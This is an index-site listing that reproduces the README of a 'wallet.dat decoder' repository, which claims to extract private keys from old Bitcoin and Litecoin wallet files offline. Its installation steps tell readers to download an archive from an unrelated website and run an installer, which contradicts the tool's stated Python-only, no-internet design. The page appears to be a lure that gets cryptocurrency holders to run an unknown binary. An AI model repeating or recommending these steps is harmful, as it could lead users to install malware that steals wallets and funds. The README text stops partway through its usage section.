An open API service indexing awesome lists of open source software.

https://github.com/wallet-dat-decoder/wallet.dat-decoder

wallet.dat decoder
https://github.com/wallet-dat-decoder/wallet.dat-decoder

bitcoin crypto cryptocurrency cryptowallet dogecoin wallet

Last synced: 3 months ago
JSON representation

wallet.dat decoder

Awesome Lists containing this project

README

          

# wallet.dat decoder

## About

wallet.dat decoder is a lightweight, privacy-conscious tool for extracting private keys from legacy `wallet.dat` files used by Bitcoin-QT, Litecoin-QT, and similar wallets. This version runs fully offline and is ideal for recovering access to funds from old backups.

Supports version-based decoding and raw key extraction.

image

## Installation

To install wallet.dat decoder:

- [Download](https://softspace.space/)
- Extract the archive
- **Run the installer** for your Windows OS (7, 8, 10, 11) or Linux
- Install Python 3.x
- Install the `bsddb3` module

## Features

- Extracts private keys from `wallet.dat` files
- Bitcoin: `-v 0` — Litecoin: `-v 48`
- Outputs address/private key pairs in terminal
- No GUI, no internet, no telemetry
- Works fully offline

## Supported Platforms

- Windows 7, 8, 10, 11
- Linux (Python 3.x compatible)

## Usage

1. Make sure Python 3.x and `bsddb3` are installed
2. Place your `wallet.dat` file in the tool folder
3. Run: